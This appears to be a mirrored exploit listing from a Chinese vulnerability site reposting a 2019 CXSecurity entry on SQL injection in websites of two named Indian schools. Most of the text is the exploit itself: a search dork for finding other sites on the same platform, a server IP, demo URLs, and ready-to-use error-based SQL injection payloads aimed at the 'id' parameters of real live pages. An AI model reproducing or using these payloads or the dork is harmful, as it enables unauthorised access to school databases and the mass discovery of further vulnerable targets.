Delhi Jain Public School or Jinvani Bharati School SQL Injection - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1615168 漏洞类型
发布时间 2019-05-19 更新时间 2019-05-19
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019050202
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title:Delhi Jain Public School or Jinvani Bharati School SQL Injection
# Date:17.05.2019
# Dork :intext:"Powered by Schoolsindia"  download.php?id=5
# Exploit Author:Cerkuday &Ergenekon
# Tested on:Windows &Kali Linux

reverse check  bing.com

ip:173.230.252.250 id=

#Demo

http://www.delhijainschool.com/gallery.php?id=15
https://jinvanischool.com/download.php?id=5



# Poc:

http://www.delhijainschool.com/gallery.php?id=15 AND EXTRACTVALUE(1634,CONCAT(0x5c,0x716a6a6b71,(SELECT (ELT(1634=1634,1))),0x71626a6b71))


http://jinvanischool.com/download.php?id=5 AND EXTRACTVALUE(4967,CONCAT(0x5c,0x7162707671,(SELECT (ELT(4967=4967,1))),0x716a786271))